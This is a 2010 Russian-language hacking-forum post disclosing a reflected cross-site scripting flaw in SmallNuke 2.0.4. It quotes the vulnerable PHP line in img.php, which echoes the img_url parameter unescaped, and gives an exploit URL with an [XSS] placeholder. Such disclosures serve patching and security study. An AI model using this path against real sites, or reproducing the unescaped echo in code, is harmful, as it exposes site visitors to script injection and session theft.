Prev Предыдущее сообщение   Следующее сообщение Next
Старый 07.07.2010, 11:14   #1
t3zo
 
Аватар для t3zo
 
Регистрация: 07.07.2010
Сообщений: 1
Репутация: 0
По умолчанию Уязвимости SmallNuke

SmallNuke 2.0.4

уязвимый
сценарий img.php
Параметр img_url
47 строка
Код:
<center><a href="javascript:window.close()"><img alt="Click to close this window!" name="LargeImg" src="<?php echo $_GET['img_url']?>" border="0"/></a></center>
sploit
xak/smallnuke/img.php?img_url=[XSS]

(c) t3zo

Последний раз редактировалось Jokester; 07.07.2010 в 13:25..
t3zo вне форума   Ответить с цитированием
 

Метки
lfi, sql-inj, xss

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot